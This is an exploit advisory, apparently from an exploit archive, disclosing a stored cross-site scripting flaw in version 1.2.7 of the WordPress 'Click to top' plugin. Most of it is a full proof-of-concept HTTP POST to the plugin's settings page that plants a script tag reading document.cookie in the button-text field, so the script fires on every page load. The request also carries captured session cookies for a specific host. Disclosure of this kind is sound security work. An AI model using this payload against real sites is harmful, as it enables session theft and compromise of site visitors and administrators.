# Exploit Title: WordPress Click to top Plugin v1.2.7 - Persistent Cross-Site Scripting # Date: 2020-08-18 # Vendor Homepage: http://wpthemespace.com/ # Vendor Changelog: https://wordpress.org/plugins/click-to-top/ # Exploit Author: Melbin K Mathew (@melbinkm) # Author Advisory: https://melbin.in/2020/08/17/stored-xss-vulnerability-in-change-wordpress-click-to-top-plugin/ # Author Homepage: https://melbin.in # Version: 1.2.7 and below 1. Description The Click to top WordPress Plugin is used to include scroll to top feature in a WordPress blog. It was found to be vulnerable to a stored Cross-Site Scripting (XSS) vulnerability. The Type scroll text field in the plugin settings page was found to be vulnerable to stored XSS, as they did not sanitize user given input properly before publishing the changes. It is triggered when a user loads any page on the website. All WordPress websites using Click to top WordPress Plugin version 1.2.7 and below are affected. 2. Proof of Concept POST /w/wp-admin/options.php HTTP/1.1 Host: 95.217.19.38 Content-Length: 722 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://95.217.19.38 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://95.217.19.38/w/wp-admin/options-general.php?page=click-to-top.php Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: wordpress_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1597746976%7CBlobP8KWB7gDuqKN4SYfQexDQcLX5q74H4H2dnZzuRF%7Cb1aafc968a6212fc1ceba7657727836762d457f9b3fc1ac5d8f957c2aa46c16e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_4d2fcfbc375cbd9e47218d95a7697ebc=mlbnkm1%7C1597746976%7CBlobP8KWB7gDuqKN4SYfQexDQcLX5q74H4H2dnZzuRF%7Cf7f732afdad727391089966b6f76603baec4a9f086a16fa81bc56fe71dfd59ef; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse; wp-settings-time-1=1597574177 Connection: close option_page=click_top_style&action=update&_wpnonce=2502676c1e&_wp_http_referer=%2Fw%2Fwp-admin%2Foptions-general.php%3Fpage%3Dclick-to-top.php&click_top_style%5Bbtn_style%5D=square&click_top_style%5Bhover_affect%5D=bubble-top&click_top_style%5Bbtn_type%5D=text&click_top_style%5Bselect_icon%5D=angle-double-up&click_top_style%5Bbtn_text%5D=Click+To+Top%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&click_top_style%5Bbg_color%5D=%23cccccc&click_top_style%5Bicon_color%5D=%23000000&click_top_style%5Bbg_hover_color%5D=%23555555&click_top_style%5Bhover_color%5D=%23ffffff&click_top_style%5Bscroll_opacity%5D=99&click_top_style%5Bscroll_padding%5D=5&click_top_style%5Bfont_size%5D=16&submit=Save+Changes